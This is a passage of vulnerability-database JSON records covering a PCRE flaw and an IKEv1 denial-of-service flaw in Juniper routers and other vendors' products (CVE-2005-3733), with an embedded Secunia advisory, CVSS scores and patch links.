          {
            "date": "2008-05-06T20:44:01",
            "db": "PACKETSTORM",
            "id": "66037"
          },
          {
            "date": "2007-11-08T23:49:30",
            "db": "PACKETSTORM",
            "id": "60800"
          },
          {
            "date": "2007-11-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          },
          {
            "date": "2008-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "date": "2007-11-07T23:46:00",
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-10-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-25023"
          },
          {
            "date": "2008-07-16T20:29:00",
            "db": "BID",
            "id": "26346"
          },
          {
            "date": "2009-02-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          },
          {
            "date": "2008-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2007-1661"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "61268"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "PCRE In the library  UTF-8 Service disruption related to the handling of regular expressions other than  (DoS) Vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2007-001064"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "design error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200711-106"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200511-0062

    Vulnerability from variot - Updated: 2026-03-09 22:16

    The Internet Key Exchange version 1 (IKEv1) implementation in Juniper JUNOS and JUNOSe software for M, T, and J-series routers before release 6.4, and E-series routers before 7-1-0, allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1. NOTE: due to the lack of details in the advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ I SAKMP (Internet Security Association and Key Management Protocol) Authentication, key management, and SA (security association) of 3 A collective term for multiple protocols. ISAKMP Derived from IKE Is IPSec Key exchange protocol for encrypted communication. In many environments IKEv1 Is used. IKE Communication by phase 1 And phase 2 Divided into phases 1 Then establish a secure communication path, ISAKMP SA Called IKE Exchange own messages. In multiple products ISAKMP/IKE Implementation is illegal ISAKMP Phase 1 There is a problem that causes abnormal behavior when receiving this packet because there is a flaw in the processing of the packet. IKE When a deliberately created packet is sent by a remote attacker with specific information for communication by ISAKMP Services or devices that implement the may be in a service outage.Please refer to the “Overview” for the impact of this vulnerability. Juniper's M, T, J and E series routers are all network router products developed by Juniper. The IKE protocol is implemented in the JUNOS and JUNOSe software. Testing of the IKE version 1 phase 1 ISAKMP test suite developed by the Oulu University Security Programming Group (OUSPG) revealed a vulnerability in the IKE protocol implementation in JUNOS and JUNOSe software. By sending specially crafted messages, vulnerable products may exhibit denial of service, format string vulnerabilities, and buffer overflows. In some cases, arbitrary code execution may also be possible.

    TITLE: Symantec Firewall/VPN/Gateway ISAKMP Message Processing Denial of Service

    SECUNIA ADVISORY ID: SA17684

    VERIFY ADVISORY: http://secunia.com/advisories/17684/

    CRITICAL: Moderately critical

    IMPACT: DoS

    WHERE:

    From remote

    OPERATING SYSTEM: Symantec Gateway Security 400 Series http://secunia.com/product/6175/ Symantec Gateway Security 300 Series http://secunia.com/product/6176/ Symantec Gateway Security 3.x http://secunia.com/product/6177/ Symantec Gateway Security 2.x http://secunia.com/product/3104/ Symantec Gateway Security 1.x http://secunia.com/product/876/ Symantec Firewall/VPN Appliance 100/200/200R http://secunia.com/product/552/

    SOFTWARE: Symantec Enterprise Firewall (SEF) 8.x http://secunia.com/product/3587/

    DESCRIPTION: Symantec has acknowledged a vulnerability in various Symantec products, which can be exploited by malicious people to cause a DoS (Denial of Service).

    For more information: SA17553

    Successful exploitation causes a DoS of the dynamic VPN services.

    The vulnerability has been reported in the following products. * Symantec Enterprise Firewall version 8.0 (Windows) * Symantec Enterprise Firewall version 8.0 (Solaris) * Symantec Gateway Security 5000 Series version 3.0 * Symantec Gateway Security 5400 version 2.0.1 * Symantec Gateway Security 5310 version 1.0 * Symantec Gateway Security 5200/5300 version 1.0 * Symantec Gateway Security 5100 * Symantec Gateway Security 400 version 2.0 * Symantec Gateway Security 300 version 2.0 * Symantec Firewall /VPN Appliance 200/200R * Symantec Firewall /VPN Appliance 100

    SOLUTION: Apply hotfixes.

    Symantec Enterprise Firewall version 8.0 (Windows): Apply SEF8.0-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html

    Symantec Enterprise Firewall version 8.0 (Solaris): Apply SEF8.0-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html

    Symantec Gateway Security 5000 Series version 3.0: Apply SGS3.0-2005114-02. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html

    Symantec Gateway Security 5400 version 2.0.1: Apply SGS2.0.1-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html

    Symantec Gateway Security 5310 version 1.0: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html

    Symantec Gateway Security 5200/5300 version 1.0: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html

    Symantec Gateway Security 5100: Apply SG7004-20051114-00. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html

    Symantec Gateway Security 400 version 2.0: Update to build 1103. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html

    Symantec Gateway Security 300 version 2.0: Update to build 1103. http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html

    Symantec Firewall /VPN Appliance 200/200R: Update to build 1.8F. http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html

    Symantec Firewall /VPN Appliance 100: Update to build 1.8F. http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html

    ORIGINAL ADVISORY: Symantec: http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html

    OTHER REFERENCES: SA17553: http://secunia.com/advisories/17553/


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "junos t",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junose m",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "junose j",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junos e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "7.0.0"
          },
          {
            "_id": null,
            "model": "junos m",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junose t",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junose e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "7.0.0"
          },
          {
            "_id": null,
            "model": "junos j",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "fortinet",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openswan linux ipsec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (x86)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "12.4"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "enterprise firewall",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "symantec",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "juniper",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "screenos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "juniper",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r54)"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55)"
          },
          {
            "_id": null,
            "model": "vpn-1/firewall-1",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "check point",
            "version": "ng with application intelligence (r55w)"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.00"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.11"
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": "11.23"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "_id": null,
            "model": "junos m",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junose m",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "junos t",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junose e",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "7.0.0"
          },
          {
            "_id": null,
            "model": "junos j",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junose j",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "junos e",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "7.0.0"
          },
          {
            "_id": null,
            "model": "junose t",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "juniper",
            "version": "6.3"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3733"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:ios",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:pix_asa",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:symantec:enterprise_firewall",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:juniper:screenos",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:checkpoint:vpn-1_firewall-1",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:hp-ux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "NISCC albatross@tim.it",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2005-3733",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2005-3733",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-14941",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2005-3733",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#226364",
                "trust": 0.8,
                "value": "16.54"
              },
              {
                "author": "NVD",
                "id": "CVE-2005-3733",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200511-304",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-14941",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14941"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3733"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "The Internet Key Exchange version 1 (IKEv1) implementation in Juniper JUNOS and JUNOSe software for M, T, and J-series routers before release 6.4, and E-series routers before 7-1-0, allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1.  NOTE: due to the lack of details in the advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ I SAKMP (Internet Security Association and Key Management Protocol) Authentication, key management, and SA (security association) of 3 A collective term for multiple protocols. ISAKMP Derived from IKE Is IPSec Key exchange protocol for encrypted communication. In many environments IKEv1 Is used. IKE Communication by phase 1 And phase 2 Divided into phases 1 Then establish a secure communication path, ISAKMP SA Called IKE Exchange own messages. In multiple products ISAKMP/IKE Implementation is illegal ISAKMP Phase 1 There is a problem that causes abnormal behavior when receiving this packet because there is a flaw in the processing of the packet. IKE When a deliberately created packet is sent by a remote attacker with specific information for communication by ISAKMP Services or devices that implement the may be in a service outage.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. Juniper\u0027s M, T, J and E series routers are all network router products developed by Juniper. The IKE protocol is implemented in the JUNOS and JUNOSe software. Testing of the IKE version 1 phase 1 ISAKMP test suite developed by the Oulu University Security Programming Group (OUSPG) revealed a vulnerability in the IKE protocol implementation in JUNOS and JUNOSe software. By sending specially crafted messages, vulnerable products may exhibit denial of service, format string vulnerabilities, and buffer overflows. In some cases, arbitrary code execution may also be possible. \n\nTITLE:\nSymantec Firewall/VPN/Gateway ISAKMP Message Processing Denial of\nService\n\nSECUNIA ADVISORY ID:\nSA17684\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/17684/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nSymantec Gateway Security 400 Series\nhttp://secunia.com/product/6175/\nSymantec Gateway Security 300 Series\nhttp://secunia.com/product/6176/\nSymantec Gateway Security 3.x\nhttp://secunia.com/product/6177/\nSymantec Gateway Security 2.x\nhttp://secunia.com/product/3104/\nSymantec Gateway Security 1.x\nhttp://secunia.com/product/876/\nSymantec Firewall/VPN Appliance 100/200/200R\nhttp://secunia.com/product/552/\n\nSOFTWARE:\nSymantec Enterprise Firewall (SEF) 8.x\nhttp://secunia.com/product/3587/\n\nDESCRIPTION:\nSymantec has acknowledged a vulnerability in various Symantec\nproducts, which can be exploited by malicious people to cause a DoS\n(Denial of Service). \n\nFor more information:\nSA17553\n\nSuccessful exploitation causes a DoS of the dynamic VPN services. \n\nThe vulnerability has been reported in the following products. \n* Symantec Enterprise Firewall version 8.0 (Windows)\n* Symantec Enterprise Firewall version 8.0 (Solaris)\n* Symantec Gateway Security 5000 Series version 3.0\n* Symantec Gateway Security 5400 version 2.0.1\n* Symantec Gateway Security 5310 version 1.0\n* Symantec Gateway Security 5200/5300 version 1.0\n* Symantec Gateway Security 5100\n* Symantec Gateway Security 400 version 2.0\n* Symantec Gateway Security 300\tversion 2.0\n* Symantec Firewall /VPN Appliance 200/200R\n* Symantec Firewall /VPN Appliance 100\n\nSOLUTION:\nApply hotfixes. \n\nSymantec Enterprise Firewall version 8.0 (Windows):\nApply SEF8.0-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html\n\nSymantec Enterprise Firewall version 8.0 (Solaris):\nApply SEF8.0-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html\n\nSymantec Gateway Security 5000 Series version 3.0:\nApply SGS3.0-2005114-02. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html\n\nSymantec Gateway Security 5400 version 2.0.1:\nApply SGS2.0.1-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html\n\nSymantec Gateway Security 5310 version 1.0:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html\n\nSymantec Gateway Security 5200/5300 version 1.0:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html\n\nSymantec Gateway Security 5100:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html\n\nSymantec Gateway Security 400 version 2.0:\nUpdate to build 1103. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html\n\nSymantec Gateway Security 300 version 2.0:\nUpdate to build 1103. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html\n\nSymantec Firewall /VPN Appliance 200/200R:\nUpdate to build 1.8F. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html\n\nSymantec Firewall /VPN Appliance 100:\nUpdate to build 1.8F. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html\n\nORIGINAL ADVISORY:\nSymantec:\nhttp://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html\n\nOTHER REFERENCES:\nSA17553:\nhttp://secunia.com/advisories/17553/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3733"
          },
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14941"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "trust": 3.3
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3733",
            "trust": 2.5
          },
          {
            "db": "SECUNIA",
            "id": "17568",
            "trust": 1.7
          },
          {
            "db": "SECTRACK",
            "id": "1015203",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2005-2410",
            "trust": 1.7
          },
          {
            "db": "BID",
            "id": "15402",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "17621",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "17684",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17663",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17838",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17553",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17608",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17668",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2005.0924",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "17902",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-14941",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41734",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14941"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-304"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000686"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3733"
          }
        ]
      },
      "id": "VAR-200511-0062",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-14941"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-03-09T22:16:18.317000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "cisco-sa-20051114-ipsec",
            "trust": 0.8,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml"
          },
          {
            "title": "HPSBUX02076",
            "trust": 0.8,
            "url": "http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00555601"
          },
          {
            "title": "HPSBUX02076",
            "trust": 0.8,
            "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/HP-UX/HPSBUX02076.html"
          },
          {
            "title": "PSN-2005-11-007",
            "trust": 0.8,
            "url": "http://www.juniper.net/support/security/alerts/PSN-2005-11-007.txt"
          },
          {
            "title": "AXSA-2006-65:1",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=362"
          },
          {
            "title": "RHSA-2006:0267",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2006-0267.html"
          },
          {
            "title": "102246",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102246-1"
          },
          {
            "title": "102246",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102246-3"
          },
          {
            "title": "SYM05-025",
            "trust": 0.8,
